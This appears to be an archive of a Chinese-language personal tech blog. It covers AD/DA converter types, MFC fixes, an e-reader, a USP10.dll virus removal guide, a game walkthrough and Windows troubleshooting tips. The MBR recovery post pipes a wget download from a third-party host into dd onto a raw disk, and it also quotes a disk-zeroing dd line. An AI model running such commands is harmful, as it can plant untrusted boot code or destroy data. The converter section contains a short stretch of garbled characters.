串並行比較型AD結構上介於並行型和逐次比較型之間,最典型的是由2個n/2位的並行型AD轉換器配合DA轉換器組成,用兩次比較實行轉換,所以稱為 Half flash(半快速)型。還有分成三步或多步實現AD轉換的叫做分級（Multistep/Subrangling）型AD,而從轉換時序角度又可稱為流水線（Pipelined）型AD,現代的分級型AD中還加入了對多次轉換結果作數位運算而修正特性等功能。這類AD速度比逐次比較型高,電路規模比並行型小。
    4）Σ-Δ(Sigma?/FONT>delta)調製型（如AD7705）
    Σ-Δ型AD由積分器、比較器、1位元DA轉換器和數位濾波器等組成。原理上近似於積分型,將輸入電壓轉換成時間(脈衝寬度)信號,用數位濾波器處理後得到數位值。電路的數位部分基本上容易單片化,因此容易做到高解析度。主要用於音頻和測量。
    5）電容陣列逐次比較型
電容陣列逐次比較型AD在內置DA轉換器中採用電容矩陣方式,也可稱為電荷再分配型。一般的電阻陣列DA轉換器中多數電阻的值必須一致,在單晶片上生成高精度的電阻並不容易。如果用電容陣列取代電阻陣列,可以用低廉成本製成高精度單片AD轉換器。最近的逐次比較型AD轉換器大多為電容陣列式的。
    6）壓頻變換型（如AD650）
壓頻變換型（Voltage-Frequency Converter）是通過間接轉換方式實現模數轉換的。其原理是首先將輸入的類比信號轉換成頻率,然後用計數器將頻率轉換成數位量。從理論上講這種AD 的解析度幾乎可以無限增加,只要採樣的時間能夠滿足輸出頻率解析度要求的累積脈衝個數的寬度。其優點是分辨率高、功耗低、價格低,但是需要外部計數電路共同完成AD轉換。
2. AD轉換器的主要技術指標
    1）分辨率(Resolution) 指數字量變化一個最小量時類比信號的變化量,定義為滿刻度與2n的比值。分辨率又稱精度,通常以數位信號的位元數來表示。
    2）轉換速率(Conversion Rate)是指完成一次從類比轉換到數位的AD轉換所需的時間的倒數。積分型AD的轉換時間是毫秒級屬低速AD,逐次比較型AD是微秒級屬中速AD,全並行/串並行型AD可達到納秒級。採樣時間則是另外一個概念,是指兩次轉換的間隔。為了保證轉換的正確完成,採樣速率(Sample Rate)必須小於或等於轉換速率。因此有人習慣上將轉換速率在數值上等同於採樣速率也是可以接受的。常用單位是ksps和Msps,表示每秒採樣千/百萬次（kilo / Million Samples per Second）。
    3）量化誤差(Quantizing Error) 由於AD的有限分辨率而引起的誤差,即有限分辨率AD的階梯狀轉移特性曲線與無限分辨率AD（理想AD）的轉移特性曲線（直線）之間的最大偏差。通常是1 個或半個最小數位量的類比變化量,表示為1LSB、1/2LSB。
    4）偏移誤差(Offset Error) 輸入信號為零時輸出信號不為零的值,可外接電位器調至最小。
    5）滿刻度誤差(Full Scale Error) 滿度輸出時對應的輸入信號與理想輸入信號值之差。
    6）線性度(Linearity) 實際轉換器的轉移函數與理想直線的最大偏移,不包括以上三種誤差。
其他指標還有：絕對精度(Absolute Accuracy) ,相對精度(Relative Accuracy),微分非線性,單調性和無錯碼,總諧波失真（Total Harmonic Distotortion縮寫THD）和積分非線性。
3. DA轉換器
DA轉換器的內部電路構成無太大差異,一般按輸出是電流還是電壓、能否作乘法運算等進行分類。大多數DA轉換器由電阻陣列和n個電流開關(或電壓開關)構成。按數位輸入值切換開關,產生比例於輸入的電流(或電壓)。此外,也有為了改善精度而把恒流源放入器件內部的。一般說來,由於電流開關的切換誤差小,大多採用電流開關型電路,電流開關型電路如果直接輸出生成的電流,則為電流輸出型DA轉換器,如果經電流椀繆棺緩笫涑觶蛭繆故涑魴? /FONT>DA轉換器。此外,電壓開關型電路為直接輸出電壓型DA轉換器。
    1）電壓輸出型（如TLC5620）
電壓輸出型DA轉換器雖有直接從電阻陣列輸出電壓的,但一般採用內置輸出放大器以低阻抗輸出。直接輸出電壓的器件僅用於高阻抗負載,由於無輸出放大器部分的延遲,故常作為高速DA轉換器使用。
    2）電流輸出型(如THS5661A)
電流輸出型DA轉換器很少直接利用電流輸出,大多外接電流—電壓轉換電路得到電壓輸出,後者有兩種方法：一是只在輸出引腳上接負載電阻而進行電流—電壓轉換,二是外接運算放大器。用負載電阻進行電流—電壓轉換的方法,雖可在電流輸出引腳上出現電壓,但必須在規定的輸出電壓範圍內使用,而且由於輸出阻抗高,所以一般外接運算放大器使用。此外,大部分CMOS DA轉換器當輸出電壓不為零時不能正確動作,所以必須外接運算放大器。
當外接運算放大器進行電流電壓轉換時,則電路構成基本上與內置放大器的電壓輸出型相同,這時由於在DA轉換器的電流建立時間上加入了達算放入器的延遲,使回應變慢。此外,這種電路中運算放大器因輸出引腳的內部電容而容易起振,有時必須作相位補償。
    3）乘算型（如AD7533）
DA轉換器中有使用恒定基準電壓的,也有在基準電壓輸入上加交流信號的,後者由於能得到數位輸入和基準電壓輸入相乘的結果而輸出,因而稱為乘算型DA轉換器。乘算型DA轉換器一般不僅可以進行乘法運算,而且可以作為使輸入信號數位化地衰減的衰減器及對輸入信號進行調製的調製器使用。
    4）一位DA轉換器
一位元DA轉換器與前述轉換方式全然不同,它將數位值轉換為脈衝寬度調製或頻率調製的輸出,然後用數位濾波器作平均化而得到一般的電壓輸出(又稱位元流方式),用於音頻等場合。
4. DA轉換器的主要技術指標：
    1）分辨率(Resolution) 指最小類比輸出量（對應數位量僅最低位元為‘1’）與最大量
（對應數字量所有有效位元為‘1’）之比。
    2）建立時間(Setting Time) 是將一個數位量轉換為穩定類比信號所需的時間,也可以認為是轉換時間。DA中常用建立時間來描述其速度,而不是AD中常用的轉換速率。一般地,電流輸出 DA建立時間較短,電壓輸出DA則較長。
其他指標還有線性度(Linearity),轉換精度,溫度係數/漂移。

delete drive letter(unmount)(xp)

2009-03-09T09:38:00.001-07:00

delete drive letter(unmount)(xp)

mountvol x:\ /D

fix progress calculation in ProgressWnd.cpp:

2009-02-28T06:37:00.001-08:00

fix progress calculation in ProgressWnd.cpp:
method CProgressWnd::SetPos

from :
nPercentage = (nPos*100)/(m_nMaxValue - m_nMinValue);

to:
nPercentage = ((nPos-m_nMinValue)*100)/(m_nMaxValue -
m_nMinValue);

http://www.codeguru.com/cpp/controls/controls/progresscontrols/comments.php/c2293/?thread=15407

COleDispatchDriver/_variant_t

2009-02-28T00:13:00.001-08:00

fix vc compiler error:

#include <afxdisp.h> /* // fix error C2504: 'COleDispatchDriver' : base class undefined # MFC Automation classes(for excel) right after "afxwin.h"//add to stdafx.h */

#include <comdef.h> /* // fix error C2065: '_variant_t' : undeclared identifier # */

Foxit eSlick

2009-02-22T20:25:00.001-08:00

Foxit eSlick要你隨身讀

由 Annti Yang 於 1 month 之前發表

文章分類: 電腦周邊, 軟體應用

Foxit原本是軟體起家，最有名的就是免費的PDF閱讀軟體，現在Foxit把觸角伸到了硬體，將推出第一款電子閱讀器eSlick，厚度1公分上下，約180克重。
用eSlick可以隨心所欲閱讀任何文件電子檔，當然內建MP3功能是一定要的，內附2GB的記憶卡及耳機，聽說一台229.99美金，約新台幣7600元，現在搶先預購可以省下1000元。
目前市面上的電子閱讀器不少，愛聽音樂的人願意買ipod，愛閱讀的人是不是也願意花錢買e-book reader？這也讓Annti想起Sony電子書閱讀器PRS-500，不知道賣得如何？不過，市場這隻無形的手會Foxit eSlick給答案的。

Tags: e-book reader, E-bookReader, foxit

http://chinese.engadget.com/2009/01/03/q408-foxit-eslick-reader/

Ultra-light ebook reader runs Linux

Dec. 19, 2008
PDF software company Foxit is readying an electronic book reader that weighs 6.4 ounces, measures 0.4 inches thick, and runs Linux. The Foxit eSlick offers E Ink's low-power electronic-paper display, ships with an MP3 player, and sells for $100 less than an Amazon Kindle.
(Click for larger view of the eSlick)

Hanlin eReader V3
(Click for details)

As if spurred on by the success of the hard-to-come-by Amazon Kindle, which was rekindled by a recent endorsement by Oprah Winfrey, more and more vendors appear to be jumping into the ebook market. Like the Kindle, many of the new ebooks run Linux, and nearly all use the low-power E Ink EPD display technology.
The eSlick appears to be very similar to the recently introduced Hanlin eReader V3, as well as Bookeen's Cybook, which is on sale in Europe. Both of those products run Linux (Wolf Linux in Hanlin's case), offer similar 7.2 x 4.7 x 0.4-inch dimensions, provide similar USB and MP3 player features, and share the same E Ink 6-inch, 800x600 gray-scale display.
Whereas the eReader V3 and Cybook use the Samsung S3C2410 clocked at 200MHz, the eSlick runs the faster Samsung S3C2440, which offers an ARM920T RISC core clocked at 400MHz. The eSlick provides more memory than the Hanlin and Bookeen readers, with 128MB RAM, and like these two E Ink cousins, it supplies an SD card slot for storage, in this case offering a 2GB card standard, expandable to 4GB.

eSlick in white

The eSlick boasts up to 8,000 pages of continuous reading on a single charge, Foxit claims. An actual duration claim in hours is not provided, because EPD displays use power only to set an image, and none to maintain it. For more about EPD technology, see E Ink's AM-100 EPD dev kit.
E Ink says its technology has appeared in a variety of watches and other consumer electronic products from Seiko, Citizen, and Microsoft. It is also used in Sony's LibriE e-book, which is available in Japan. Linux ebook readers that use E Ink e-paper include the Readius, Amazon Kindle, eRead Star eBook STK-101, and the original iRex iLiad.

eSlick up close

Aside from the low weight, the key asset that seems to differentiate the eSlick is Foxit's embedded display software. The ebook reader offers Foxit Reader preinstalled, providing features including font controls with text reflow, and a zoom capability that is said to enlarge pages from 50 percent to 400 percent. Format support is limited to PDF and TXT files, but the device ships with Foxit's PC-based PDF Creator software, which is said to convert any printable document with formats including TXT, PPT, DOC, XLS, and HTML to PDF document format. Documents can then be downloaded to the eSlick via the USB connection. The Creator software, however, only runs on Windows.

The eSlick includes an MP3 player

Specifications listed for the eSlick include:

Processor -- Samsung S3C2440 ARM 400MHz
Memory -- 128MB
Flash expansion -- SD Card slot (2GB card included); supports up to 4GB
Display -- 6-inch E Ink Vizplex screen with 600 x 800 resolution and 166 dpi, 4-level gray scale
USB -- 1 x USB 2.0 port (cable included)
Audio -- MP3 player; earphones and adapter
Controls -- Buttons for power, up, down, left, right, enter, delete, menu, and music
Plugs -- Euro 2Pin, UK 3Pin, US 2Pin
Battery -- rechargeable Lithium
Case colors -- black, gray, or white
Dimensions -- 7.4 x 4.7 x 0.4 inches (188 ?118 ?9.2mm)
Weight -- 6.4 oz (180g) with battery; AC adapter included
Text formats -- PDF, TXT
Bundled software -- Foxit Reader Pro Pack, PDF Creator, PDF Editor (trial); PDF Page Organizer Pro (trial)
Operating system -- embedded Linux

Availability
The Foxit eSlick will be available in January for an introductory price of $230 (standard price $260). More information may be available here.

http://linuxdevices.com/news/NS8442724020.html

http://www.foxitsoftware.com/ebook/overview.html

USP10.dll病毒詳解與查殺攻略

2009-02-08T08:49:00.001-08:00

USP10.dll病毒詳解與查殺攻略

作者:shazi1896 日期:2009-02-02

認識USP10.dll：
USP是Unicode Scripts Processor的簡稱，意思就是“Unicode文字系統處理器”。它是微軟開發的Windows作業系統為正確演示Unicode文字而開發的元件，系統的核心即一個名為USP10.DLL的DLL。它從Windows 2000開始連同Windows一起捆綁，Win 9x的用戶在更新至Internet Explorer 5.0之後，系統亦會安裝有本元件。USP的當前最新版本是隨同Windows Server 2008 RTM、Windows Vista SP1等所附帶的1.626.6001.18000。
USP主要包括以下的部件：
1.把文字從輸入次序重排成為顯示次序
2.把文字按前文後理作出適當的變換
3.按文字顯示的方向作出字元的替換
雖然Uniscribe從Windows 2000開始隨系統提供，但不同版本的Uniscribe對各地不同的文字有不同的支援：最初的版本只支持泰語、越南語，之後到希伯來語和阿拉伯語。從Windows XP開始支援幾個主要的南亞文字及亞述語，但僧加羅語、高棉語、緬甸語及各種使用蒙古文字的語言，由於他們的具體編碼方式在Windows XP推出時還未落實，因此未能正式支持。現時不少為這些語言而設計的軟體，在USP10.dll未更新之前，都不能正確操作。
總結一下：
DLL文件：usp10或者usp10.dll
DLL名稱：Uniscribe Unicode script processor
描述：usp10.dll是字元顯示腳本應用程式介面相關檔。
屬於：Uniscribe
系統 DLL檔：是
常見錯誤：File Not Found, Missing File, Exception Errors
USP10.dll病毒原理：
正常的USP10.dll是字元顯示腳本應用程式介面相關檔，存在於C:\WINDOWS\system32\USP10.dll，也有可能存在於C:\WINDOWS\system32\dllcache\USP10.dll。
usp10.dll木馬病毒則是利用window系統目錄優先權來啟動。
首先來說說這個目錄優先權，windows系統在執行一個檔時，首先會在“當前目錄”查找所要執行的檔，如果當前目錄不存在這個檔，就會到windows\system32\下去查找，如果還是不存在，就會到windows\目錄下去查找，如果還是不存在就會在環境變數PATH中的目錄下去查找，這個就是windows目錄優先權。
這裏還要告訴大家是，一個exe檔執行會調用系統不少的DLL。
瞭解了這個目錄優先權和exe應用程式執行時會調用系統dll後，不少朋友可能都已經想到了，這個USP10.dll為什麼會把自身大量複製到每個可執行檔同目錄下，為什麼會取名為USP10.dll？對，複製自身就是讓可執行檔在執行的時候搶佔目錄優先權，而命名為USP10.dll是因為在windows\system32\也有個USP10.dll，很多應用程式啟動時都會調用這個dll，這就是這個USP10.dll病毒的啟動原理了。
USP10.dll病毒手動查殺：
首先打開“我的電腦”，選擇功能表欄“工具”下的“檔夾選項”，去掉“隱藏受保護的作業系統檔（推薦）”前邊的勾，再勾選“顯示所有檔和檔夾”。這樣做是因為這個USP10.dll病毒把自身修改為系統檔和隱藏檔，正常情況下是看不到的。
USP10.dll病毒會感染系統裏所有exe檔，並且把自身複製到被感染exe檔的當前目錄。
所以大家需要到安全模式去刪除病毒，在安全模式下，病毒還是會駐留在某些系統進程裏，這裏不用害怕，我們來一步步消滅這可惡的病毒。
在開始功能表選擇“搜索”，點擊“所有檔和檔夾”，在“全部或部分檔案名”裏寫上“usp10.dll”，然後直接點“搜索”,系統會搜索出所有盤符下的USP10.dll病毒。
注意：C:\WINDOWS\system32\USP10.dll和C:\WINDOWS\system32\dllcache\USP10.dll目錄檔的不是病毒，其他的都是，等把所有usp10.dll搜索出來後，就刪除掉。C:\WINDOWS\USP10.dll可能一時刪不了，這個也是病毒，只是還有進程在使用他，我們可以先給他改個名字，重命名一下，只要不是usp10.dll就可以，然後重新啟動，再回到C:\WINDOWS\把你剛改的名字的病毒刪掉就可以了。當然可以借助冰刃（http://www.2000xg.com/article.asp?id=567）工具。
這裏我總結下：C:\WINDOWS\system32\USP10.dll和C:\WINDOWS\system32\dllcache\USP10.dll不能刪，其他usp10.dll都刪除，C:\WINDOWS\USP10.dll可能一時刪不了，重命名後刪除。
如果您還覺得不放心，可以在註冊表查詢USP10.dll，刪除可疑項目。
注意：此方法有個缺陷，即病毒雖然被查殺，但系統檔也已經遭到破壞。所以推薦下邊的查殺方法。
來自瑞星卡卡安全論壇的查殺方法：
1、http://bbs.ikaka.com/showtopic-8592261.aspx
2、http://bbs.ikaka.com/showtopic-8589597.aspx
按照相關指示進行操作，步驟比較簡單，大家都可以看懂，我就不贅述了。
總結：目前此病毒還在進一步的蔓延，而各安全廠商也沒有給出專殺工具，作為我們普通線民，就需要多費點腦力體力，儘量保護我們的電腦！祝大家好運！

http://www.2000xg.com/default.asp?id=976

Murder In A Wheel - Walkthrough

2009-01-31T04:49:00.001-08:00

Murder In A Wheel - Walkthrough (Renzo Thönen/2007)

By Leon December 3, 2008

Warning! This page contains the complete solution or walk-through to this game. Reading this page can spoil the challenge to complete the game by yourself. Please consider this when reading on. The walk-through of this game given here might not be the optimal solution, it’s a solution. Just to prove that the game can be finished. If you want a section of the walk-through or just a hint, send us an email with the part where you’re stuck, we’ll send you the section of the page you’ll need.

After your conversation with Lord Blackwin where you tell him your profession, the hamster got murdered.

When he asks you to accept the investigation of the hamsters death you accept. Look at the hamster and notice the collar. Something’s missing. Pick up the hamster to find him already stiff. Look at the grating and find it loose so you can open it. Take the FAN from the desk. Walk through the door and pick up the VIOLIN standing on the table.

Look at the cat’s basket to notice the hair. Pick up the CAT’S HAIR. Open the laundry chute and look at it. There’s something stuck but you can’t reach. Walk down the stairs and open the door under the stairs. Look at the storage closet to find the PLIERS. Close the door again and use the door next to it into the kitchen.

Talk to Elsa about everything. Open the drawer left of the cooker and take the pair of SCISSORS out. Look at the cat and her bowl. There’s something in it but you can’t take it. Leave the kitchen and in the hallway use the pliers on the hooks left of the stairs to take a HOOK. Walk up the stairs again and enter the door next to it. On the bed is a COAT HANGER. Take it. Use the scissors on the ball of yarn to take a STRING off. Use the string with the coat hanger to make a bow. Use the scissors on the ball of yarn to take another STRING and use that with the hook. Leave the room and use the string and hook with the laundry chute to get the HANDKERCHIEF out. Look at it to see the stains on it.

Leave the room and walk down the stairs. Use the door in the north to enter the kitchen again. Use the violin to play a bit and let the milk turn sour. You can now use cat’s bowl to take the LITTLE BELL out. Leave the kitchen and open the door on the right to enter the lounge. Give the little bell to Lord Blackwin. So now the cat’s accused of murder. But that can’t be true.

Leave the lounge and walk north into the kitchen. Talk to Elsa again and ask for her feather duster. Tell her you need it to prove the cat’s innocence and you’ll get the DUSTER. Use the duster on the open grate in the kitchen and it’ll turn black. So the cat didn’t go in there.

Leave the kitchen and enter the door on the right to go to the lounge. Use the fan on the power outlet on the right and use the fan to turn it on. Use the cat hair with the fan and Dr. Hadley will sneeze because of his allergy. While sneezing he looses an ARTICLE. Pick it up and look at it to read it.

Present all the evidence so far to Lord Blackwin. Give him the hanky, then the black duster and the article. Leave the lounge and go north into the kitchen. Talk to Elsa again and talk about everything. She’ll tell you more background information on the cat and gives a combination of the safe. Leave the kitchen on the left, go up the stairs and go into the bedroom on the right.

Open the painting to reveal the safe and open the safe to apply the combination you practiced earlier that day. Look at the opened safe to find another hamster. This one is alive and explains a lot! Take the HAMSTER with you and leave the room. Go down the stairs. Walk down the stairs, go into the lounge on the right and give the hamster to Lord Blackwin. There you will also present your final theory.

Lord Blackwin will ask you several questions you have to answer:

- Who killed the hamster? A cat.
- How did the hamster die? Dr. Hadley gave it to a cat.
- When did the hamster get killed? It had been dead for at least a day.
- Why do you think that? There were dry blood stains on the hanky.
- Who brought the hamster inside? Dr. Hadley.
- Who swapped the hamsters? Lady Blackwin.
- Why the swap? It should look like the cat killed the hamster.
- And why? Because then the cat would go to the zoo.

The Lord Blackwin is satisfied and thinks the case is closed. But then the real truth is told.

http://www.bigbluecup.com/games.php?action=detail&id=941

http://www.bigbluecup.com/games.php?action=download&game=941

http://gamesolutions.efzeven.nl/murder-in-a-wheel-walkthrough-renzo-thonen2007/

http://hulub.ch/murderinawheel.php

修正midi 不能播放

2009-01-31T02:34:00.001-08:00

修正midi不能播放

fix "No General MIDI DLS file was specified in the registry"

導入directmusic.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic]
"GMFilePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
00,74,00,25,00,5c,00,53,00,59,00,53,00,54,00,45,00,4d,00,33,00,32,00,5c,00,\
64,00,72,00,69,00,76,00,65,00,72,00,73,00,5c,00,47,00,4d,00,2e,00,44,00,4c,\
00,53,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic\Defaults]
"DefaultOutputPort"="{58C2B4D0-46E7-11D1-89AC-00A0C9054129}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic\SoftwareSynths]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic\SoftwareSynths\{58C2B4D0-46E7-11D1-89AC-00A0C9054129}]
"Description"="Microsoft Software Synthesizer"

免費螢幕畫筆工具(簡報用)

2009-01-30T01:11:00.001-08:00

Download ZoomIt
(129 KB)

免費螢幕畫筆工具(簡報用)

ZoomIt v3.01

By Mark Russinovich

Published: January 12, 2009

http://technet.microsoft.com/en-us/sysinternals/bb897434.aspx

Pioneer DJS 1.601 電腦專用的全音階DJ播放工具

2009-01-29T23:44:00.001-08:00

Pioneer DJS 1.601 電腦專用的全音階DJ播放工具

PIONEER 發售DJM1000/EFX1000之後，許多玩家期待PIONEER能發售更多優秀的DJ產品，如CDJ新款產品或是DJM600的升級款。不過目前都還沒有新消息，顯然還需要一段時間才會有。 PIONEER明年焦點轉移到DJ軟體，由於這幾年越來越多有創作的DJ喜愛用電腦混音，PIONEER因應此趨勢，研發了DJS混音軟體，DJS軟體操作模式以及功能都會和PIONEER PRODJ所發售的DJ硬體接近，讓喜愛PIONEER DJ系列產品的玩家能玩的更得心應手。軟體包含兩台CDJ一台混音器，另外還有類似EFX500的效果器。這軟體還提供轉檔功能，可將WAVE轉成 MP3。
Full-scale DJ play on your home PC: start your DJ career today.
Get the same playability and functionality as our CD-Decks and mixers on your home PC.
• Auto Beat Mix and Program Play
• CDJ or "Vinyl" (scratching) mode
• Onboard multi-effects syncable to BPM
Pioneer’s DJS software was designed for professional and amateur DJs to enable full-scale DJ play on a PC. The software offers the same playability and functionality as the company's Pro DJ products, using a PC instead of two CDJ turntables and a DJ mixer. The DJS software combines the key elements of Pioneer's professional digital CD decks and mixers with a host of innovative features including:
* Auto mixing
* Waveform display for indicating playing position and cue/loop points
* BPM synchronization and beat synchronization
* Eight effects including Delay, Echo, Auto Pan, Trans, Filter, Flanger, Reverb and Pitch Shifter
* Fader start function for controlling the playback of two players (channel, fader and cross fader)
* Create function for setting four points for cues or loops in a song
Also included is a ripping function for converting CD, line input signals and wave files to MP3.
The graphic user interface is intuitive and easy to understand. It follows the same ergonomic design used in all Pioneer CDJ products and mixers. The display shows everything a professional DJ needs to see, including time, BPM, mixer controls, jog dial, hot cue buttons, etc.
The DJ can assign basic functions to a particular key on the PC keyboard. By doing this for frequently used functions, the DJ can establish his or her own playing style – on a keyboard. In addition, the “SYNC” feature automatically beat matches the cued track to the track that is playing and a powerful effects program mimics the effector features of the DJM-600.

軟體虛擬化:

2009-01-25T05:34:00.001-08:00

軟體虛擬化:

http://www.symantec.com/community/page/86/get-svs-here-now

復原 Windows MBR 的各種方式

2009-01-25T01:01:00.001-08:00

復原 Windows MBR 的各種方式

玩 Linux 最常見的方式就是切 Partition 做多重開機, 讓 GRUB 寫入 MBR 做開機選單. 但是若不小心把 Linux Partition 刪掉了, 或是哪天不想玩 Linux 了, 想恢復為 Windows 單一作業環境的時候, 就得把 Windows Pre-Boot 程式寫回 MBR 的前 446 Bytes 喔!

方法一：使用 DOS / Win9x / ME 開機片開機

開機後在 MS-DOS 模式下執行 fdisk /mbr
重新啟動電腦即可

方法二：使用 Windows 2000 / XP 光碟片開機 (過程中需要 Administrator 密碼)

在 Welcome to Setup (歡迎使用安裝程式) 畫面中按 R 或 F10 進入「Windows 修復主控台」

進入主控台後, 輸入 fixmbr
重新啟動電腦即可

詳細操作過程請參考微軟官方網頁 - Windows XP 修復主控台的說明

方法三：使用 Linux 光碟片開機, 進入 Rescue 模式; 或用 KNOPPIX 之類的 Linux 作業系統開機 (過程中請啟用網路)

依序輸入以下指令恢復 Windows MBR

wget http://cha.homeip.net/downloads/ms.mbr -O /tmp/ms.mbr
dd if=/tmp/ms.mbr of=/dev/hda
exit (重開機時請移除光碟片)

以上操作結果同 fdisk /mbr
網路上流傳 dd if=/dev/zero of=/dev/hda bs=446 count=1 效果等同 fdisk /mbr 是錯誤的, 這樣只會清掉 MBR 的 Pre-Boot 內容而已.
警告: 請勿於頭腦混沌、神智不清時使用 dd 指令; 使用時請特別注意數字是否正確!

方法四：什麼開機片都沒有, 但開機後還有 GRUB> 提示符號

依序輸入以下指令啟動 Windows

rootnoverify (hd0,0)
makeactive
chainloader +1
boot

(hd0,0) 其中 hd0 表示 Primary IDE Master HDD, 0 表示第一個分割區, 請依實際狀況套用.
注意: 這只是解決 Windows 的啟動問題而已, 仍要靠前三種方法的其中一種才能讓 MBR 恢復正常喔! 當然, Windows 開機後您也可以上網尋找其他的解決方案 :)

參考資料：

BBS 留言討論 - 關於 MBR (Big5 編碼)
GRUB Manual: Booting (英文)

免費磁碟加密:

2009-01-21T03:09:00.001-08:00

免費磁碟加密:

http://www.freeotfe.org/index.html

http://www.freeotfe.org/features.html

http://www.freeotfe.org/download.html

http://www.freeotfe.org/screenshots_pc.html

http://www.freeotfe.org/translations.html

Debut Video Capture Software 免費畫面錄影

2009-01-20T00:49:00.001-08:00

Debut Video Capture Software
Record video from webcam, capture devices or screen

http://www.nchsoftware.com/capture/debutsetup.exe

Records video in many different file formats including .avi, .wmv, .flv, .asf .mpg, .3gp, .mp4, .mov and more

http://www.nchsoftware.com/capture/index.html

[WinXP] 無法"切換使用者"解法

2009-01-16T08:14:00.000-08:00

[WinXP] 無法"切換使用者"解法

(1)要先啟動 Terminal Services 才可以

(2)開始→控制台→使用者帳戶→變更使用者登入登出方式

裡面兩個都給他打勾

開啟windows7 media player的音樂視覺效果:

2009-01-16T07:20:00.000-08:00

開啟windows7 media player的音樂視覺效果:

(1)由清單切到現正播放:(右下角的Switch to Now Playing)

(2)右鍵選單的[魔力]->[隨機]

[Word技巧] 簡簡單單讓Word自動「生」出目錄 - 一般目錄篇

2007-07-28T19:23:00.000-07:00

[Word技巧] 簡簡單單讓Word自動「生」出目錄 - 一般目錄篇
本篇文章以Word 2003為例示範
如果您是手動key目錄一族，應該有過為了目錄頁數對不齊而發狂的經驗吧！？其實word早有一套「生目錄」的方法，只是很多人不曉得該如何去用他罷了。這篇文章讀完後，可以讓您從此不再有編目錄的惡夢，三兩下就把目錄K.O.，一招學起來，終身受用無窮，趕快看下去吧！！
Word可以自動幫您建立一般目錄、表目錄、圖目錄…甚至任何您想做的目錄都可以，方法很簡單，只要跟著下面的方法一步一步設定就可以輕鬆完成，不過…在正式開始前先說明所謂的「階層」。
「階層」就是當文章有分章節編排時，會有如第一章→§1-1、§1-2這類附屬於第一章內的小節，此時，第一章就為文章內的第一階層；而附屬小節§1-1、§1-2就是文章內的第二階層，如果小節內又再細分的話就依此類推為第三、四或更高階層。
如下圖所示：大標題為第一階層；大標題內的副標題則為第二階層，依此類推第三、四……階層。

Part 1 - 設定階層
Step 1 在Word工具列上空白處按滑鼠右鍵，勾選【大綱】項目，讓它顯示在工具列上方便我們快速設定文字階層。

Step 2 將由標移到欲設定標題階層的文字左側，選擇【第一階層】，依此類推附屬標題的階層為第二、三、四階層。
※如果您以「Shift+Enter」空行的話，屬於此標題以內的內容將會全部被標示為與標題相同的階層，這是錯誤的！建議以「Enter」直接空行，除非您願意花時間將內文部份再另外自行設定。
這個步驟是最重要的，只要階層設定得妥，接下來產生目錄的步驟就會非常簡單，確定設定無誤的話，我們就來「生」目錄吧！

Part2 - 產生目錄
Step 1 為了避免因插入目錄影響到內容的編排，我們必須在第一頁前插入一個「不計算頁數」的空白頁（也就是第0頁）。
選擇【插入】→【分隔設定】，接著選擇【下一頁】→【確定】。

※此例假設我們的目錄只有一頁，在插入頁碼時務必要把【第一頁顯示頁碼】取消勾選。

Step 2 接著在第一頁任何地方點一下滑鼠左鍵，讓游標移至第一頁。在選擇【插入】→【參照】→【索引及目錄】，切換到【目錄】標籤後按下【確定】，您設定好的目錄就會依據階層的設定而出現在眼前了。

完成！！

Word的功能是不是很方便呢？可別小看word，很多細部功能都可以幫您省下不少編排的時間，如果學得精，別人花一小時的工作，您可能10分鐘就做完了。這個目錄看似是個小技巧，但是卻可以花上許多人好幾個小時的時間甚至還要求助於別人，與其這樣不如早點學起來，您說是吧！

[開補習班一定很賺]

2007-02-02T19:22:00.000-08:00

[開補習班一定很賺]
2007,2/2 早上上班時，發現陸上汽車機車都變多了，後來看新聞才知道原來是～大學學測的第一天。現在雖然沒有大學聯考了，但是還是有學測,只是換了考試的名稱與方式。有一個同事，過完年準備辭職，去補習班補習，準備考研究所。中午就聊到，補習班老闆一定很賺阿。假設一個學生收4萬，來個500個學生，4x500=2000(萬)，一個老師20堂課，若鐘點費給2萬，2x20=40(萬)，2000-40=1960(萬)阿～真好賺@@

2007 的101 煙火

2007-01-05T08:04:00.000-08:00

2007 的101 煙火, (錄到路人的吶喊"我要賺大錢"冏)

感1：sony 錢太多,3分鐘花掉3千萬

感2：人潮多到爆,看煙火去程30分鐘,回程2小時囧

http://www.im.tv/vlog/personal/255563/963133

MSN can not login. Error code: 81000314 or 80072745MSN 遇到錯誤碼 81000314 或 80072745 無法登入?

2006-09-12T03:09:00.000-07:00

MSN can not login. Error code: 81000314 or 80072745MSN 遇到錯誤碼 81000314 或 80072745 無法登入?
可能是 MSN 的 Server 正在改 IP, 因為 TTL 的關係, 使得查
解決方法:
開始/執行, 輸入
notepad %windir%\system32\drivers\etc\hosts
加入以下兩行
65.54.239.80 messenger.hotmail.com
65.54.239.80 dp.msnmessenger.akadns.net
存檔, 重連 MSN
ref. Solution for recent sign in error code 81000314 - MSN Messenger news
另外, MSN 最近流出 8.1 Beta 版 (Build 8.1.0064), 載點可到 mess.be 找, 此版本登入比 8.0 慢許多, 不建議使用

MSN無法登入之錯誤碼辨別大全

2006-07-08T22:14:00.000-07:00

MSN無法登入之錯誤碼辨別大全

====================================================
-錯誤碼---------|----------------------------原因&解決方法----------------------------|
====================================================
80048820 這個為時間同步問題, 請把你的電腦時間調整成正確的當地時
間即可恢復正常(不知道時間請撥打中原標準時間電話熱線)
XP可按圖片D的匡起部分
不行的話請下載檔案A
------------------------------------------------------------------------------------------------
如果以上方法無法修復請嘗試這個
控制台的"新增移除程式"點選"MSN Messnger7.5下的{按這裡取得支援資訊} 然後點選{修護},然後關閉防火牆
------------------------------------------------------------------------------------------------
80072EFD Internet網際網路選項裡面->連線->區域網路設定中的Proxy是否
81000365 有打勾, 有的話取消打勾
8100035b
------------------------------------------------------------------------------------------------
81000306 設定電腦時間和網路時間同步, 開啟MSN->工具->選項->連線->進階設定->把圖A所框的通通清空
81000efd 然後執行另類方法1
81000301 關閉防火牆
確定連上網路, 確定Windows 更新為最新, 確定MSN在那個版本為最新的例如7.5 分為 7.5.1299和7.5.1599之類的
------------------------------------------------------------------------------------------------
80004005 伺服器過忙/連線閒置過久/連線Delay過久
------------------------------------------------------------------------------------------------
81000370 檢視網際網路選項, 把[內容] 索引標籤的[憑證] 下方[清除 SSL 狀態]
